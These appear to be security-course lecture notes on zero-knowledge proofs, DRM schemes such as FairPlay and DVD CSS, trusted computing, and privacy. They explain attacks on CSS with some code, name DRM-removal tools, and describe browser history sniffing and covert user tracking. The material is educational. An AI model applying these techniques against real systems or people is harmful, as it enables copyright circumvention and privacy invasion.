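    return frozenset(frozenset(perm[v] for v in edge) for edge in edges)


def compose(outer, inner):
    """Permutation that applies `inner` first, then `outer`."""
    return [outer[inner[v]] for v in range(len(inner))]


def invert(perm):
    """Inverse permutation: undoes the relabelling done by `perm`."""
    inv = [0] * len(perm)
    for v, image in enumerate(perm):
        inv[image] = v
    return inv


def run_round(G, T, secret, n, rng):
    """One round; `secret` maps G onto T and is known only to the Prover."""
    a = list(range(n))
    rng.shuffle(a)                       # Prover: fresh random a, G -> G'
    G_prime = apply_perm(G, a)           # Prover shows G' to the Verifier
    challenge = rng.choice("ab")         # Verifier asks for a or for b
    if challenge == "a":
        return apply_perm(G, a) == G_prime   # Verifier checks a: G -> G'
    b = compose(secret, invert(a))       # Prover: b maps G' -> T
    return apply_perm(G_prime, b) == T   # Verifier checks b: G' -> T
```

An honest Prover passes every round. A Prover whose secret is not really an isomorphism fails whenever b is requested, so the chance of surviving n rounds is about 1/2^n.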

DRM
What is Digital Rights Management


Previously, we had analog technologies such as cassettes and VHS tapes. If you made a copy of a cassette or VHS tape, there was some degradation in the quality of the music or video, and there was also some cost involved. It was not practical (or even possible) to make millions of copies of a single tape and distribute them throughout the world.

As we have moved from analog to digital technologies (and with the introduction of the internet), the ease with which we can copy and distribute content has dramatically increased. Making copies of content has essentially become free. Obviously, this doesn't sit well with the big music and movie companies, who want to protect their content. Hence, several schemes to guard against the unauthorised copying and distribution of these products have been created. This is what has come to be known as digital rights management, or DRM.

DRM is a class of technologies that allow rights owners to set and enforce the terms by which people use their digital content. Rights owners are typically copyright-holding companies like music, film, book or software publishers. The first generation of DRM really only sought to control the copying of content. Increasingly these days, second generation DRM attempts to control viewing, copying, printing, altering and basically anything else you can do with digital content.

Rights owners use DRM to attach 'rules' to content that control how documents, music, movies, entire software programs, or even e-mails are used. The aim of DRM is to support the secure promotion, sale, and delivery of digital content. Some of the more notable DRM schemes include:
- Apple's FairPlay (protects AAC files)
- Content Scramble System (CSS) (protects DVD-Video)
- Advanced Access Content System (AACS) (protects HD-DVD)
- Windows Media DRM

DRM relies on encryption to protect the actual content, and on authentication systems to ensure that only authorised users can unlock the files.

DRM System
Obviously, DRM is not much use on a single device! There isn't much point in controlling your own access to content you create on your own computer. Therefore, DRM is usually used in a wider system that allows users to purchase content, and then controls users' access to that content. A high-level view of what such a DRM system may look like is:

A Case Study - FairPlay (Apple iTunes Store)


How it works
In order to use the iTunes store, you need to sign up with Apple for an iTunes store account. This account must be associated with an "authorised" computer running iTunes. Each authorised computer has a globally unique ID constructed from the hardware on that computer (MAC address/hard drives/etc - varies on Mac/Windows)

When you buy a song, iTunes generates a "user key" and sends it to the store. The store encrypts the song with a "master key" and sends you the song, then iTunes (the client) encrypts the song+master key with the user key. Both the client and the store save the user key and associate it with the account. Note that the main encryption process occurs on the client computer - this eases the load on Apple's servers. In order to play the song, iTunes looks up the associated user key, uses this to decrypt the master key, and then uses this to decrypt the actual content.
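The key hierarchy described above (content locked with a master key, master key locked with a per-purchase user key) can be sketched like this. It is a toy illustration only: the XOR keystream cipher, the function names and the package layout are all assumptions, and nothing here reflects the actual FairPlay file format or algorithms.

```python
import hashlib
import secrets


def keystream_xor(key: bytes, data: bytes) -> bytes:
    """Toy symmetric cipher: XOR with a SHA-256 counter keystream.

    Applying it twice with the same key returns the original data.
    Illustration only; not suitable for protecting real content.
    """
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + offset.to_bytes(8, "big")).digest()
        chunk = data[offset:offset + 32]
        out.extend(b ^ p for b, p in zip(chunk, pad))
    return bytes(out)


def package_song(song: bytes, master_key: bytes, user_key: bytes) -> dict:
    """Lock the content with the master key, then wrap that key per user."""
    return {
        "content": keystream_xor(master_key, song),
        "wrapped_master_key": keystream_xor(user_key, master_key),
    }


def play_song(package: dict, user_key: bytes) -> bytes:
    """Unwrap the master key with the user key, then decrypt the content."""
    master_key = keystream_xor(user_key, package["wrapped_master_key"])
    return keystream_xor(master_key, package["content"])
```

One reason for the two layers is that authorising another computer only requires handing over the small user keys, while the bulky encrypted content stays unchanged.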

Each new purchase generates a new user key, which again is stored locally & on the store servers. If you authorise a new computer (you can have up to 5 per account), the store server associates its unique ID with your account, and then sends a copy of all the user keys associated with the account. If you deauthorise a computer, the unique ID is removed from your account, and the iTunes client deletes all user keys associated with the account. (If you backup your key file before deauthorising the computer, you can later restore it and end up with more than 5 authorised computers! This starts to get impractical if you keep buying new songs though.)

If you have an iPod, when you connect it to iTunes it simply copies all the keys for the songs you copy to the iPod. The iPod was deliberately simplified with the complexity again delegated to iTunes. This is why if someone connects their iPod to my computer, all their music will be deleted & replaced with mine.

Attacks on FairPlay
The iTunes store as a whole is a closed system: iTunes is obviously closed-source, and Apple does not publish any details about the interaction between iTunes and the store. This makes it inherently difficult for attackers, as they must use reverse engineering to learn how it works. Further, it is a changing target. Apple frequently updates the store and the client, partly to close loopholes that have been discovered and exploited. They are also able to force users to upgrade the client, e.g. by preventing users of old versions from purchasing new content or authorising computers.

So far, there is no method to decrypt an arbitrary song; however, there have been several methods of removing the DRM from songs that the user does have access rights for. These are, in rough chronological order:
- QTFairUse / PlayFair / Hymn / JHymn (all similar/related): intercepts the AAC data stream as it is sent to the sound card.
- PyMusique: an iTunes client for Linux that impersonated iTunes, connected to the iTunes store and downloaded files. Unfortunately, they forgot to write the bit that encrypted the files client-side, causing Apple to shut them down!
- FairKeys: impersonates iTunes, using the unique computer ID, and requests keys for previously bought content.
- Requiem: decrypts the local iTunes key file, and directly decrypts files using the keys therein. It does not remove personally identifiable information from the file, so it would be unwise to share these files publicly, even though it is technically possible for others to play them.

Note that none of these currently work in the recently-released iTunes 8. Requiem works for all versions prior to 8, and the developer has publicly stated that he is working on iTunes 8 compatibility.

Problems with DRM


1. One of the most significant problems with DRM today is its proprietary nature and lack of widely accepted standards. If I download a song through iTunes, I can play that song on my iPod but I can't take that song to a Sony MP3 player and expect it to work. If a set of standards were established and widely accepted, it might be possible to take content and play it across many different kinds of device.
2. The proprietary nature of DRM creates another issue. The DRM solutions that individual companies create fail more often than not, partly because they generally rely on keeping parts of their algorithm a secret. As we have previously discussed in class, one of Kerckhoffs' principles for the security of a cryptosystem is that it should not rely on keeping the algorithm a secret, and Richard has talked about the benefits of a peer reviewed algorithm. An example of a DRM cryptosystem that failed (spectacularly) once its method was revealed is the Content Scramble System (CSS), which still exists on most DVDs today.
3. As discussed in earlier lectures, when a security system loses the sympathy of the average user, people are inclined to undermine that security system at every given opportunity.
4. Below are some examples of DRM systems that have caused harm to legitimate users.

When DRM Goes Bad


Sony rootkit - In 2005, Sony included a DRM program on music CDs that automatically installed itself on the user's computer. This program allowed other malicious code to execute on the user's computer, and experts stated that it was effectively a rootkit (hence it became known as the 'Sony rootkit'). Sony was forced to recall these CDs (over 2 million sold).
MSN Music - When MSN Music shut down, users lost the ability to move their music to other computers or devices, or to format their computers (and keep the music), as they are no longer able to get authorisation keys.
VeriTouch iVue Media Player - The VeriTouch iVue Media Player is a Linux-based MP3 player. To solve the problem of users having physical access to the device (a significant advantage to the would-be attacker), this player erases all data if it detects someone trying to open the box.

Attacks on DRM
Attack Methods
The type of attack method varies widely from DRM scheme to DRM scheme. This is due to the proprietary nature of DRM. One of the main weaknesses of DRM is that you are often required to place the software/hardware in the user's environment, and hence the attackers often have physical access to the security system.

Analogue Hole
Jon Lech Johansen once said that "If you can hear the music, if you can see the picture, you have been given the means to decrypt the once-encrypted information. Whatever your ears can hear and your eyes can see can certainly be recorded again, without encryption, by electronic means".

The analog hole is a term coined by the Motion Picture Association of America (MPAA) to refer to the vulnerability in DRM protection schemes that allows anyone with the right software and/or equipment to re-record analog content into digital format. The quality of the reproduction can vary radically with the method of re-recording used. For example, if you took a mini-DVD camcorder and sat in a movie theatre to record a box office movie being played, the quality of the reproduction would be significantly lower than the original film. But let's say you use iTunes to re-record your DRM protected content to CD and then rip it back onto the computer in a DRM free format. There will be some loss of quality, but it is fairly minimal.

The so called analog hole is a significant concern for the creators of DRM protected content, so much so that in the US the MPAA has lobbied the government to introduce legislation to regulate analog-to-digital conversion hardware (ADCs). The movie industry wants all ADC hardware to carry a technology to detect and refuse attempts to copy protected content. So far these bills have failed.

E-Books, PDFs and Word Documents


DRM is employed as a means to protect the author's intellectual property: it can prevent people who purchase or are given documents from modifying the files without permission. Similarly, it prevents unauthorised redistribution of these files. Some methods of employing DRM on documents include:

Phoning home.
Registering files to computers and accounts.
Click-wrap licensing (like EULAs).
Proprietary hardware/software combinations.

eBooks
A large variety of eBook formats have been produced, but the ones commonly thought of are those provided by Amazon.com and those that are read by Microsoft's Reader. DRM is employed in some eBooks by pairing proprietary formats with dedicated readers or hardware. Some of these devices phone home, which allows the use of the eBooks to be tracked along with the purchaser's reading habits. Other DRM methods are simple "click-wrap" licenses which restrict the user's rights to distribute the eBook or use it freely in the public domain.

eBooks sold by Amazon.com are in a format supported by their Kindle device, an embedded system used to read AZW files. AZW files employ their own proprietary DRM scheme. The Kindle terms of use disallow the transfer of eBooks to other people or other Kindle devices.

Microsoft's Reader naturally uses its own proprietary format, called .lit (standing for literature), which is an extension of the old CHM format. It copy-protects DRM'ed eBooks by allowing users to read them only on Reader programs that are tied to their Microsoft Passport account. The limit is 6 computers; it is possible to request additional computers individually, but this is at Microsoft's discretion.

This leads to the general criticism of eBooks. They're meant to be alternatives to the traditional paperback, but the limitations of DRM and the associated licenses remove the freedom of use that comes with an ordinary paperback. It isn't so simple to lend an eBook to a friend; in fact, if you did you may well be sued if the publisher found out. This is part of why eBooks have not been terribly successful, especially given the coupling of proprietary formats and proprietary readers. It may also be why many of these DRM schemes have not been hacked or cracked: there's not a "market" for it.

PDFs
As of this year, PDF is officially an open standard. The standard defines 40-bit and 128-bit RC4 encryption for documents that are to be encrypted. PDF files can also be embedded with DRM schemes that limit viewing, editing and printing of the document, but this is entirely dependent on the reader obeying the scheme.

A solution provided by various companies is to supply an encryption scheme together with a special reader. One example is DRM-X provided by Haihaisoft, touted to be "The World's Most Powerful DRM." They provide a means to limit viewing, editing and printing through their own encryption scheme and their own proprietary reader. Through an ActiveX control, the PDF is encrypted for the user. A username and password combination is required to open the file in the Haihaisoft PDF Reader.

Word Docs
Since Microsoft Office 2003, users have been able to secure their documents in a similar fashion to PDFs. In addition, they can add time limits to the files and specify the groups and users that can access each file.

Cracking and Hacking
The main means of circumventing DRM protected documents is the analogue hole. The main "attacks" have been to take screenshots of the documents (or print and rescan them) and feed them through an OCR program. If the scheme employed involves basic password encryption, brute-force attacks are possible. One Russian company, Elcomsoft, provides various password recovery programs that include brute-force, mask, dictionary and key index attacks.

Trusted Computing & PS3's


Trusted Computing is an ideal that seeks to establish end to end security. Of course, this involves both hardware and software aspects and requires collaboration between various industries. Quite often, software engineers write robust protection schemes, while computer engineers fail to secure communications or other potential points of eavesdropping.

Trusted Computing seeks to prevent a multitude of attacks by securing the system both from external attackers and from users themselves. In doing this, Trusted Computing aims to prevent social engineering and eavesdropping. Of course, in order to guarantee a secure platform, Trusted Computing relies upon access control lists and a piece of hardware called the Trusted Platform Module (TPM). The TPM is meant to uniquely identify machines and securely implement encryption schemes.

Trusted Computing is underpinned by five important concepts:

Endorsement Key - Allows systems to establish unique identities, thus tying content to specific users on specific machines.
Secure Comms - Allows for secure exchange of data.
Memory curtaining - Full isolation between user space memory and sensitive areas of memory.
Sealed Storage - Using the machine's and user's unique identity, all private information will be readable only with the exact same setup. This both protects information and binds it to users.
Remote Attestation - Allows remote entities to gather information about your computing platform, thereby attesting its integrity. It also allows for remote permissions management.

All of these concepts work together to yield the 5 desirable properties of security, which I won't go into detail on because we should all be familiar with them.

Issues with Trusted Computing
A major issue with Trusted Computing is the fact that it behaves like an unrecoverable rootkit. Users are forced to work with the Trusted Computing platform, in a Big Brother-esque way.
While Trusted Computing platforms attempt to provide robust security, they still aren't foolproof. Analogue attacks are one example.
Trusted Computing is also a very draconian approach to DRM, and imposes strict policies which inconvenience users and may deny users legitimate use of their systems.
The fact that Trusted Computing uses unique user and machine IDs to both store and send data means that almost all transactions are traceable to each user. This in itself is a HUGE privacy issue.

PS3 as a Trusted Computing Platform
The PS3 is not a true Trusted Computing platform:

It does not have a TPM chip.
It is not certified as a Trusted Computing Platform.

It uses:

A hypervisor to separate applications and the operating system from direct access to hardware.
'Jails' for applications (they run in separate memory spaces).
Restricted access to hardware capabilities for software not signed by Sony.
AACS for video content protection.
Disc integrity checks for games.

However, it does embody many of TC's concepts:

Endorsement Key - Ties content to specific users on specific machines. Used to ban users from servers and restricted content.
Secure Comms - Allows for secure exchange of data, e.g. HDCP for transport of high definition content to output devices.
Memory curtaining - Full isolation between user space memory and sensitive areas of memory. Prevents memory hooks and exploits.
Remote Attestation - Checks the authenticity of games online and checks the integrity of the operating system.

Drives for Breaking the PS3's Protection

Unlocking hardware capabilities.
Piracy.

Why it remains secure

Just like the Xbox 360, the PS3's online playing service allows for the banning of consoles. Of course, online game play is a major feature of both platforms. (Detection / Response measure)
Newer games refuse to play on old (possibly compromised) versions of firmware. Sony uses games as a medium to force updates. (Response measure)
The homebrew scene is almost uninterested in breaking Sony's DRM. The Cell's computational power alone is sufficient for homebrew games. (Preventative measure)

DVD CSS: Content Scramble System

All keys are 40 bits long. For example, a key could look like this in hex: "AB CD EF 01 02". The key size is 40 bits to fit in with US crypto export restrictions.

Your DVD player (software or hardware) has at least one "Player Key". There are 409 player keys in total.
Each DVD has a "Disk Key". The DVD stores its Disk Key only in encrypted form: it holds 409 different encrypted copies, one for each player key. So, a valid player key will be able to obtain a valid disk key.
Each DVD has many titles, and each title has a "Title Key". It is encrypted by the "Disk Key".
Each title has many segments, and each segment has a "Segment Key". However, it is stored in plaintext and is used to augment the title key.
Each title is made up of a data stream (usually MPEG-2). The data stream is stored as ciphertext encoded by (Title Key XOR Segment Key).
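The last step of the key hierarchy, combining the title key with the segment key, can be sketched in C. This is only an illustration of the XOR described above, assuming both keys are 5 bytes (40 bits) long; the names `css_stream_key` and `CSS_KEY_BYTES` are made up for this sketch and do not come from any real CSS implementation.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define CSS_KEY_BYTES 5   /* all CSS keys are 40 bits long */

/* XOR the (already decrypted) title key with the plaintext segment key
 * to get the key that actually seeds the stream cipher for a segment. */
void css_stream_key(const uint8_t title_key[CSS_KEY_BYTES],
                    const uint8_t segment_key[CSS_KEY_BYTES],
                    uint8_t out[CSS_KEY_BYTES])
{
    assert(title_key != NULL && segment_key != NULL && out != NULL);
    for (size_t i = 0; i < CSS_KEY_BYTES; i++)
        out[i] = (uint8_t)(title_key[i] ^ segment_key[i]);
}
```

Because the segment key is stored in plaintext, it adds no secrecy of its own; it only makes each segment use a different effective key.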

LFSR
Before we can talk about the CSS Algorithm, you need to know what an LFSR is. An LFSR is a "Linear Feedback Shift Register". It is used to generate a pseudo-random sequence of bits. Each LFSR has a fixed bit width, for example 16 bits, and a set of taps, e.g. 0, 14, 15. An LFSR is set up with a starting "seed", which is just a number that fits within the bit width. After it has been seeded, we can then "clock" (or in the case of CSS, "chomp") the register to generate one pseudo-random bit. A worked example is the best way to show this. Consider this register, which has been seeded with "4243":

=================================================================
| 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | => 4243
=================================================================

The register bits show the seed value. Let's "clock" it once. To clock it, we first read the value of the bits on the taps (0 on the right; 14 and 15 on the left) and run them through a feedback function, which in most cases is XOR:

=================================================================
| 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | => 4243
=================================================================
  |   |                                                       |
  0   0                                                       1      Output = 0 xor 0 xor 1 => 1

The taps have values 1, 0 and 0, which when XORed together have the value 1. So, this is our random bit that we return! But wait, there's more! We also need to clock (modify) the register, so we shift all the bits one place to the right and feed the output in on the left hand side. The new value of the register is:

=================================================================
| 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | => 34889
=================================================================

If we were to clock it again, we would get a 0 (1 xor 0 xor 1 == 0). We can continue to clock it as many times as we like. HOWEVER there are downsides! LFSRs are deterministic, and they are also cyclic. Eventually this register will return to the initial seed, and the bits generated will follow the same pattern again. With a properly chosen set of taps, it will generate (2^16 - 1) pseudo-random bits before cycling. Also note that given a starting seed of 0, it will remain at 0, so usually seed > 0 is enforced (or a fixed bit is forced on, e.g. seed | 0x1000).

What is neat about LFSRs? Given only a short run of output from an LFSR, it is really hard to work out its starting seed! In fact, with so little information the only solution is a brute force across all possible starting seeds. (Think about it: in the example given, if we knew the first output bit, we would have 4 possible values for the taps and NO information about any other bits; we would need much more output to attempt to work out the starting state.)

It is interesting to note that the LFSRs used in CSS differ from regular LFSRs. Usually the output bit is the one shifted off the end, but in the CSS version it is the result of the feedback function. This change makes it much easier to deduce the starting state from a small number of output bytes.
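The worked example can be sketched in C as follows. This is a minimal illustration that follows the register diagrams (shift right, with the feedback bit entering on the left); the names `lfsr16_clock` and `LFSR16_TAPS` are made up for this sketch. As in the CSS variant, the bit returned is the result of the feedback function rather than the bit shifted off the end.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Taps at bit positions 0, 14 and 15, as in the worked example. */
#define LFSR16_TAPS ((1u << 0) | (1u << 14) | (1u << 15))

/* Clock the register once: XOR the tapped bits together, shift the
 * register right by one place and feed the XOR result in at bit 15.
 * Returns the feedback bit, which is also the output bit. */
unsigned lfsr16_clock(uint16_t *state)
{
    assert(state != NULL);
    unsigned tapped = *state & LFSR16_TAPS;
    unsigned bit = 0;
    while (tapped != 0) {          /* parity of the tapped bits */
        bit ^= tapped & 1u;
        tapped >>= 1;
    }
    *state = (uint16_t)((*state >> 1) | (bit << 15));
    return bit;
}
```

Seeding the register with 4243 and calling `lfsr16_clock` twice returns 1 and then 0, and the register holds 34889 after the first call, matching the diagrams.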

The CSS Algorithm


Whenever we say "encoded", it means using the CSS Algorithm in one of its various modes. The modes do not differ enough to mention them here; they are just various settings for inverters in front of the LFSRs. See the sources for more info.

CSS uses 2 LFSRs:

25 bit, initialised with the first 3 bytes of the Title Key.
17 bit, initialised with the last 2 bytes of the Title Key.

Both LFSRs have 0x100 injected to make an extra bit (and to ensure the register is non-zero). Each LFSR is clocked 8 times to form one output byte. The two bytes are added together, and the carry from the last round is added in (or 0 if there was no last round). This output is then XORed with the data stream to form the ciphertext.

[Figure not reproduced: four diagrams showing the LFSR configuration with taps.]

There is also a "table based substitution" step. For the purpose of this discussion we're going to ignore it, because it does not add anything to the complexity of the algorithm; it is purely there to confuse any reverse-engineering efforts. Also note that the inverters are for the modes, which will also not be discussed here.

Reverse Engineering
This hack came about because an anonymous person found the player key for the Xing DVD player. The player key was stored in memory, unencrypted. With details of the player key, the algorithm was reverse engineered and explored in depth.
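The keystream generation described under The CSS Algorithm can be sketched in C. This is a simplified illustration, not the real cipher: the tap masks `LFSR17_TAPS` and `LFSR25_TAPS` are placeholders chosen for the sketch, the 0x100 is simply ORed into each seed instead of being inserted as an extra bit, and the inverters and the table based substitution are left out. The two seeds are passed in directly, so the sketch makes no claim about which key bytes feed which register.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Placeholder tap masks for this sketch only (NOT the real CSS taps). */
#define LFSR17_TAPS 0x4001u   /* bits 0 and 14 */
#define LFSR25_TAPS 0x1019u   /* bits 0, 3, 4 and 12 */

typedef struct {
    uint32_t state;   /* current register contents */
    uint32_t taps;    /* mask of tapped bit positions */
    unsigned width;   /* register width in bits */
} lfsr_t;

/* Clock once; the feedback bit is also the output bit (the CSS variant). */
static unsigned lfsr_clock(lfsr_t *r)
{
    uint32_t t = r->state & r->taps;
    unsigned bit = 0;
    for (; t != 0; t >>= 1)
        bit ^= (unsigned)(t & 1u);
    r->state = (r->state >> 1) | ((uint32_t)bit << (r->width - 1));
    return bit;
}

/* Clock eight times and pack the output bits into one byte, first bit highest. */
static uint8_t lfsr_byte(lfsr_t *r)
{
    uint8_t out = 0;
    for (int i = 0; i < 8; i++)
        out = (uint8_t)((out << 1) | lfsr_clock(r));
    return out;
}

/* XOR len bytes of buf in place with the combined keystream.
 * Running it twice with the same seeds restores the original data. */
void css_like_crypt(uint32_t seed17, uint32_t seed25, uint8_t *buf, size_t len)
{
    assert(buf != NULL || len == 0);
    /* OR in 0x100 so that neither register can start at zero. */
    lfsr_t a = { (seed17 | 0x100u) & 0x1FFFFu,   LFSR17_TAPS, 17 };
    lfsr_t b = { (seed25 | 0x100u) & 0x1FFFFFFu, LFSR25_TAPS, 25 };
    unsigned carry = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned x = lfsr_byte(&a);
        unsigned y = lfsr_byte(&b);
        unsigned sum = x + y + carry;   /* 8-bit add with carry-in */
        carry = sum >> 8;               /* carry into the next round */
        buf[i] ^= (uint8_t)sum;
    }
}
```

The addition with carry is the only non-linear step that mixes the two registers, which is why an attacker who guesses one register's output can work out the other's.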

Attacks on CSS
Brute Force 2^40
The key size is 40 bits. CSS was released in 1998. Brute forcing on one CPU of commodity hardware with highly optimised code, 2^40 keys take less than a month. Recall that there are a fixed number of player keys, 409 to be precise. Player keys cannot be changed because that would cause millions of hardware DVD players to stop working. So, on average, a brute force would hit a valid player key about every 2 hours (a month is roughly 720 hours, and 720 / 409 is about 1.8). Remember that only one player key is needed... (It should also be noted that within a week of the first player key being exposed, all 409 keys were exposed.)

Known Plaintext 2^25
For simplicity, assume that we know the first 5 bytes of data in both plaintext and ciphertext. This might come about, for example, if CSS was used to encrypt a known filetype that has a known, standard header. With this information, we want to find the title key that decrypts the rest of the data. Recall that the title key is stored split up as the initial seeds for the two LFSRs. So, if we could just work out the initial seeds for the LFSRs, we would have the key for the rest of the file.

How does it work? We guess the starting state of LFSR17. Recall that there are 2^16 possible starting states. For each:

We clock it out 3 bytes and deduce what the value must be for LFSR25 at that stage by looking at the (ciphertext XOR plaintext).
This will give us a known value for LFSR25 at that stage, but we will not know the value of one of the bits, so we clock it backwards 4 and try both states. Some of the states can be culled, since the 4th bit must be 1.
For any states that look correct, we verify with our disk key hash.

This is a little complex; let me try to rephrase it with less jargon:

We brute force all possible values of LFSR17.
Because we know the ciphertext and plaintext, we can deduce what the other LFSR must be outputting for up to 3 clocks ahead, so we clock our LFSR17 ahead 3.
From here, we deduce what the value of LFSR25 must be, and search back to find what the seed must have been.
Because we have 5 output bytes, we will be able to find all but the highest bit in LFSR25, so we brute force both solutions.
Finally, with each of our solutions, we attempt to verify them by running the output key against the (expensive) disk key hash.

Complex? Yes. Do you need to know it? Not unless you want to rewrite libdvdcss.

Other Attacks
There is a known 2^16 attack to get the Disk Key using only the Disk Key hash. This is what most current day media players fall back to if their list of player keys fails.

There is so much more to CSS than just what is presented here. Several interesting bits have been cut due to time constraints, for example the secret handshake between the DVD drive and the CSS decrypter to transfer the keys. Make sure you check out the three sources listed at the top for a very in-depth look into CSS.
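The "deduce what LFSR25 must be outputting" step of the known plaintext attack can be sketched in C. It assumes the combining step is the byte-wise addition with carry described for the CSS algorithm; the function name `css_deduce_other_lfsr` and its parameters are made up for this illustration. The keystream is the ciphertext XORed with the known plaintext, and `lfsr17_out` holds the bytes produced by the current guess for LFSR17.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Forward direction used by the cipher, for each byte i:
 *     sum = a[i] + b[i] + carry;  key[i] = sum & 0xFF;  carry = sum >> 8;
 * Given key[] and a guess for a[], this recovers the b[] that LFSR25
 * must have produced for the guess to be consistent. */
void css_deduce_other_lfsr(const uint8_t *keystream, const uint8_t *lfsr17_out,
                           uint8_t *lfsr25_out, size_t len)
{
    assert(keystream != NULL && lfsr17_out != NULL && lfsr25_out != NULL);
    unsigned carry = 0;
    for (size_t i = 0; i < len; i++) {
        /* Subtraction modulo 256 undoes the addition. */
        uint8_t b = (uint8_t)(keystream[i] - lfsr17_out[i] - carry);
        lfsr25_out[i] = b;
        /* Recompute the carry the cipher would have passed on. */
        carry = ((unsigned)lfsr17_out[i] + b + carry) >> 8;
    }
}
```

Each of the 2^16 guesses for LFSR17 yields exactly one candidate output sequence for LFSR25, which is then checked by trying to run LFSR25 backwards to a seed.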

Week12/NiceNotes
Security Funding
SECURITY IS EXPENSIVE - If you want it, you've got to pay for it.
A HARD SELL - But you have to do it, or you will be ineffective as a security expert.
What do you do? You need to show the costs of insufficient levels of security and work out an appropriate level from there.
Hollow logs - Budget on scary things, spend on sensible things.

SCARE the #$^& out of your boss


Fear seems to be the biggest motivating factor in getting money, so:

Hack your own system to show it can be done (works well, provided they don't fire you on the spot).
Hire penetration testers.
Calculate the cost to the business of being attacked.

Once you have tricked your boss into giving you lots of money, don't spend it all at once. Keep some of it aside as a contingency plan. You will need it when an attack does take place.

Why should we Care About Privacy?


AOL Leaks - AOL researchers recently published the search logs of about 650,000 members, a total of 36,389,629 individual searches.

"A list of 20 million search inquiries collected over a three-month period was published last month on a new Web site (research.aol.com) meant to endear AOL to academic researchers by providing several sets of data for study. AOL assigned each of the users a unique number, so the list shows what a person was interested in over many different searches."

Internet users mirrored the search logs and constructed searchable databases. From these, the full search history of an individual user could be reconstructed.

Some people were identified by the content of their searches.

PGP
Pretty Good Privacy

"Email is unencrypted, terrible for anything you want to keep private!" Not true! Email can be sent using PGP and tunnels.

In order to use PGP you need to create a public and private key pair, distributing your public key to the world and keeping your private key, well, private. PGP allows you to:

Sign messages (authenticate your identity and the fact that you authored the message). When you send a message to someone, you encrypt the message's hash using your private key and send it along with the message. The recipient decrypts the encrypted hash using your public key. If the decrypted hash matches the actual message hash, the message was probably sent by you (this has the added side effect of ensuring message integrity).
Encrypt messages (so that only the legitimate recipient can read them). Everyone who wants to send an encrypted message to you encrypts it with your public key. The message can only be decrypted by your private key.

Is it secure? The algorithm is sound, but there are always other ways of breaking through: PGP is still open to being broken by rubber hose cryptanalysis. The FBI has used keyloggers on the computers of drug lords in order to steal their private key passphrases and then read all their encrypted messages.

TOR - The Onion Router
Tor is a free software implementation of second-generation onion routing, a system enabling its users to communicate anonymously on the Internet.

"You cannot browse the internet absolutely anonymously and privately"
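Going back to PGP signing, the sign and verify steps described under Pretty Good Privacy can be sketched in C with textbook RSA. Everything here is a toy chosen for illustration and is an assumption of this sketch rather than how PGP is implemented: the modulus 3233 (61 x 53) is far too small to be secure, `toy_hash` is a stand-in for a real cryptographic hash, and the names `toy_sign` and `toy_verify` are made up.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy RSA key pair built from p = 61 and q = 53. */
#define TOY_N 3233u   /* modulus, part of both keys */
#define TOY_E 17u     /* public exponent */
#define TOY_D 2753u   /* private exponent */

/* Square-and-multiply modular exponentiation. */
static uint32_t modpow(uint32_t base, uint32_t exp, uint32_t mod)
{
    uint64_t result = 1, b = base % mod;
    while (exp != 0) {
        if (exp & 1u)
            result = (result * b) % mod;
        b = (b * b) % mod;
        exp >>= 1;
    }
    return (uint32_t)result;
}

/* Stand-in for a real hash: a djb2-style hash reduced modulo TOY_N. */
static uint32_t toy_hash(const char *msg)
{
    assert(msg != NULL);
    uint32_t h = 5381;
    for (; *msg != '\0'; msg++)
        h = h * 33u + (unsigned char)*msg;
    return h % TOY_N;
}

/* Sender: "encrypt" the message hash with the private key. */
uint32_t toy_sign(const char *msg)
{
    return modpow(toy_hash(msg), TOY_D, TOY_N);
}

/* Recipient: "decrypt" the signature with the public key and compare it
 * with a freshly computed hash. Returns 1 on a match, 0 otherwise. */
int toy_verify(const char *msg, uint32_t sig)
{
    return modpow(sig, TOY_E, TOY_N) == toy_hash(msg);
}
```

A signature produced by `toy_sign("hello")` verifies against "hello" but not against "hellp", which shows how signing also gives message integrity.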

Stealing Your Data


What Tim Did
Tim hosted an image on his server and posted it on the forum. When the server received requests for the image, it would log the HTTP header data, parse the "who's logged in" page and work out who the data was about.

What Adam Did
Adam logged CSE ssh sessions and logins.

3rd party tracking


CSS HACK
CSS (here meaning Cascading Style Sheets, not the DVD Content Scramble System) determines what colour links will be. JavaScript can ask what colour links are. So, we can render lots and lots of links, check what colour they are, remove all of the links and write down the visited ones, all with JavaScript. That way the server can check your history and find out which sites you frequent. This can be used for targeted phishing/social engineering attacks.

COOKIES
Cookies have a bad reputation, but they are not worms, viruses or spyware. They are just a small data file saved to a user's hard drive by a website so that the website can remember the user when they come back. This is especially useful when different users are accessing the internet through the same IP address, for example when going through a proxy or router. Cookies serve as a unique identifier so that the website can identify the user and retrieve any relevant details about them from its database, such as their preferences on that website. This usage can be of convenience and benefit for both the user and the website.

But cookies can also be used for surveillance. They can be used for tracking the web pages accessed by a user on a given site. This information can be used to create a profile of the user based on their browsing choices and actions.
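On the server side, using a cookie as an identifier comes down to pulling one name=value pair out of the Cookie header the browser sends with each request. The C function below is a minimal sketch of that lookup; the name `cookie_get` and the example cookie names are made up for this illustration, and the function does no URL-decoding of the value.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Look up name in a Cookie header value such as "theme=dark; uid=42".
 * On success copies the value into out (always NUL-terminated) and
 * returns 1. Returns 0 if the cookie is absent or does not fit in out. */
int cookie_get(const char *header, const char *name, char *out, size_t outlen)
{
    assert(header != NULL && name != NULL && out != NULL && outlen > 0);
    size_t nlen = strlen(name);
    const char *p = header;
    while (*p != '\0') {
        while (*p == ' ' || *p == ';')      /* skip separators */
            p++;
        const char *end = strchr(p, ';');   /* end of this pair */
        if (end == NULL)
            end = p + strlen(p);
        if ((size_t)(end - p) > nlen &&
            strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            size_t vlen = (size_t)(end - p) - nlen - 1;
            if (vlen >= outlen)
                return 0;                   /* value too long for out */
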